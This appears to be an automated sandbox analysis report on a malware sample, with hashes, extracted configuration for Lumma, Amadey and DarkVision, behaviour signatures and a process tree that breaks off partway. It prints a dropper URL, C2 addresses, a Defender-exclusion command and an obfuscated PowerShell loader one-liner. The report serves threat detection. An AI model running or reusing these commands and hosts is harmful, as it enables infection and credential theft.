Resubmissions

20/04/2025, 02:25

250420-cwqv9sz1bz 10

19/04/2025, 21:06

250419-zxwt8sxmt7 10

19/04/2025, 11:21

250419-nf95raxj18 10

Analysis

  • max time kernel
    372s
  • max time network
    373s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250410-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250410-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    20/04/2025, 02:25

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    a4442e4267d3d5b639f79f08b52bbb1b

  • SHA1

    e4741a2091c03939fb2c7f8eb2be940b09d42131

  • SHA256

    f2584f132a6e2588475dd0dbcb480d0e84988029d54d8bea33b0410df1734a58

  • SHA512

    fab6972044ce38728a7765d19f05b5c2d198e61eaa36762559a1964a9eea8f0a1fe45df9bfeb2603e25d02c5c9cd97885d55e9cb75f0186880dd279e5eed0ccc

  • SSDEEP

    49152:fbwoAqWRZQ5mDPf47OXC6h0X4eOPy4DK:jTCZ+mDPQ7+C6WPOVDK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.39.17.162/testmine/random.exe

Extracted

Family

lumma

C2

https://clarmodq.top/qoxo

https://opiratetwrath.run/ytus

https://.changeaie.top/geps

https://quilltayle.live/gksi

https://liftally.top/xasj

https://nighetwhisper.top/lekd

https://4asalaccgfa.top/gsooz

https://zestmodp.top/zeda

https://starofliught.top/wozd

https://meerkaty.digital/sagf

https://piratetwrath.run/ytus

https://changeaie.top/geps

https://ssalaccgfa.top/gsooz

https://jawdedmirror.run/ewqd

https://lonfgshadow.live/xawi

https://3liftally.top/xasj

https://.nighetwhisper.top/lekd

https://salaccgfa.top/gsooz

https://owlflright.digital/qopy

https://nchangeaie.top/geps

Extracted

Family

amadey

Version

5.34

Botnet

8ac6b9

C2

http://185.215.113.59

Attributes
  • install_dir

    f1e82329e5

  • install_file

    namez.exe

  • strings_key

    022d16de15289562e076160ac426da7d

  • url_paths

    /Dy5h4kus/index.php

rc4.plain

Extracted

Family

darkvision

C2

82.29.67.160

Attributes
  • url

    http://107.174.192.179/data/003

    https://grabify.link/ZATFQO

    http://107.174.192.179/clean

  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Detects Healer an antivirus disabler dropper 1 IoCs
  • Detects Rhadamanthys payload 1 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Rhadamanthys family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 25 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 9 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Uses browser remote debugging 2 TTPs 12 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 3 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 3 IoCs

    remove IFEO.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 7 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 36 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies Control Panel 3 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 18 IoCs
  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 32 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:3088
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
          PID:10020
        • C:\Windows\SysWOW64\fontdrvhost.exe
          "C:\Windows\System32\fontdrvhost.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:6404
      • C:\Users\Admin\AppData\Local\Temp\random.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe"
        1⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5224
        • C:\Users\Admin\AppData\Local\Temp\FC8EB13MXLKFC6SOSHM0CW5GA1.exe
          "C:\Users\Admin\AppData\Local\Temp\FC8EB13MXLKFC6SOSHM0CW5GA1.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4544
          • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
            "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
            3⤵
            • Downloads MZ/PE file
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:5704
            • C:\Users\Admin\AppData\Local\Temp\10000260101\1fb3acb064.exe
              "C:\Users\Admin\AppData\Local\Temp\10000260101\1fb3acb064.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3932
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                5⤵
                  PID:5384
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2840
              • C:\Users\Admin\AppData\Local\Temp\10001030101\LAc2heq.exe
                "C:\Users\Admin\AppData\Local\Temp\10001030101\LAc2heq.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4604
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3752
              • C:\Users\Admin\AppData\Local\Temp\10001850101\Hmcm0Oj.exe
                "C:\Users\Admin\AppData\Local\Temp\10001850101\Hmcm0Oj.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2696
              • C:\Users\Admin\AppData\Local\Temp\10004650101\235T1TS.exe
                "C:\Users\Admin\AppData\Local\Temp\10004650101\235T1TS.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:3244
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2884
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2756
                • C:\Windows\system32\svchost.exe
                  "C:\Windows\system32\svchost.exe"
                  5⤵
                  • Downloads MZ/PE file
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:5608
                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    6⤵
                    • Executes dropped EXE
                    PID:5980
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """
                    6⤵
                      PID:1628
                    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                      "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                      6⤵
                      • Deletes itself
                      • Executes dropped EXE
                      PID:2316
                      • C:\Users\Admin\AppData\Local\Temp\{409ae252-af48-4045-93be-f07644709986}\5be2288.exe
                        "C:\Users\Admin\AppData\Local\Temp\{409ae252-af48-4045-93be-f07644709986}\5be2288.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                        7⤵
                        • Executes dropped EXE
                        • Checks for VirtualBox DLLs, possible anti-VM trick
                        • System Location Discovery: System Language Discovery
                        PID:9760
                        • C:\Users\Admin\AppData\Local\Temp\{6afd3e43-f742-446a-b8aa-512694160f0d}\8101ae6c.exe
                          C:/Users/Admin/AppData/Local/Temp/{6afd3e43-f742-446a-b8aa-512694160f0d}/\8101ae6c.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                          8⤵
                          • Drops file in Drivers directory
                          • Sets service image path in registry
                          • Drops startup file
                          • Executes dropped EXE
                          • Impair Defenses: Safe Mode Boot
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Checks for any installed AV software in registry
                          • Enumerates connected drives
                          • Writes to the Master Boot Record (MBR)
                          • Checks for VirtualBox DLLs, possible anti-VM trick
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: LoadsDriver
                          PID:11220
                • C:\Users\Admin\AppData\Local\Temp\10013260101\xztOH3r.exe
                  "C:\Users\Admin\AppData\Local\Temp\10013260101\xztOH3r.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:1404
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1320
                • C:\Users\Admin\AppData\Local\Temp\10036890101\21d3425115.exe
                  "C:\Users\Admin\AppData\Local\Temp\10036890101\21d3425115.exe"
                  4⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Writes to the Master Boot Record (MBR)
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:13152
                • C:\Users\Admin\AppData\Local\Temp\10037070101\i5Kz53x.exe
                  "C:\Users\Admin\AppData\Local\Temp\10037070101\i5Kz53x.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:6932
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    5⤵
                      PID:3544
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      5⤵
                      • Downloads MZ/PE file
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2740
                  • C:\Users\Admin\AppData\Local\Temp\10047800101\GitcS6s.exe
                    "C:\Users\Admin\AppData\Local\Temp\10047800101\GitcS6s.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1384
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:8012
                    • C:\Windows\SysWOW64\cmd.exe
                      Cmd.ExE /c StARt /mIn PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:5460
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        PoWERsheLL -w H -C "Iex([SySTeM.TEXT.eNCoDiNg]::UTf8.getStrIng([SYsTEm.convERt]::FroMBASE64stRINg(($iLrRl=[SYStEM.Io.fILe]::REAdALlteXt('C:\Users\Admin\AppData\Local\Temp\10049091121\690BRuM.cmd')).substrInG($iLrRl.lENgtH - 3155928))))"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • System Location Discovery: System Language Discovery
                        PID:8148
                        • C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe
                          "C:\Users\Admin\AppData\Local\ZskZOgxSzfJebDEwQ.exe" C:\Users\Admin\AppData\Local\JYhVoaFaykTob.au3
                          7⤵
                          • Executes dropped EXE
                          PID:10192
                          • C:\Windows\SysWOW64\iexpress.exe
                            C:\Windows\SysWOW64\iexpress.exe
                            8⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • System Location Discovery: System Language Discovery
                            PID:3108
                  • C:\Users\Admin\AppData\Local\Temp\10050410101\7IPCJFu.exe
                    "C:\Users\Admin\AppData\Local\Temp\10050410101\7IPCJFu.exe"
                    4⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    PID:8916
                  • C:\Users\Admin\AppData\Local\Temp\10055800101\zBbvtJ0.exe
                    "C:\Users\Admin\AppData\Local\Temp\10055800101\zBbvtJ0.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:10520
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:12084
                  • C:\Users\Admin\AppData\Local\Temp\10060750101\WE297Tp.exe
                    "C:\Users\Admin\AppData\Local\Temp\10060750101\WE297Tp.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:12968
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      5⤵
                        PID:5116
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        PID:5576
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                          6⤵
                          • Uses browser remote debugging
                          PID:11408
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x21c,0x22c,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd10
                            7⤵
                              PID:11448
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            6⤵
                            • Uses browser remote debugging
                            • Drops file in Windows directory
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            PID:8936
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd10
                              7⤵
                                PID:892
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2096,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=2092 /prefetch:2
                                7⤵
                                  PID:10076
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=1992 /prefetch:3
                                  7⤵
                                    PID:10172
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=2412 /prefetch:8
                                    7⤵
                                      PID:5536
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=3208 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:10276
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=3240 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:4412
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4408,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=4444 /prefetch:1
                                      7⤵
                                      • Uses browser remote debugging
                                      PID:10880
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5064,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=5068 /prefetch:8
                                      7⤵
                                        PID:12048
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,3402450445316354899,11090500846272634790,262144 --variations-seed-version=20250417-180112.233000 --mojo-platform-channel-handle=5340 /prefetch:8
                                        7⤵
                                          PID:548
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        6⤵
                                        • Uses browser remote debugging
                                        • Drops file in Windows directory
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        PID:12664
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ff84679f208,0x7ff84679f214,0x7ff84679f220
                                          7⤵
                                            PID:12764
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1944,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:3
                                            7⤵
                                              PID:9240
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2264,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:2
                                              7⤵
                                                PID:2928
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1880,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=2724 /prefetch:8
                                                7⤵
                                                  PID:9320
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3484,i,16918982237869938154,5001213302799639046,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  PID:10572
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
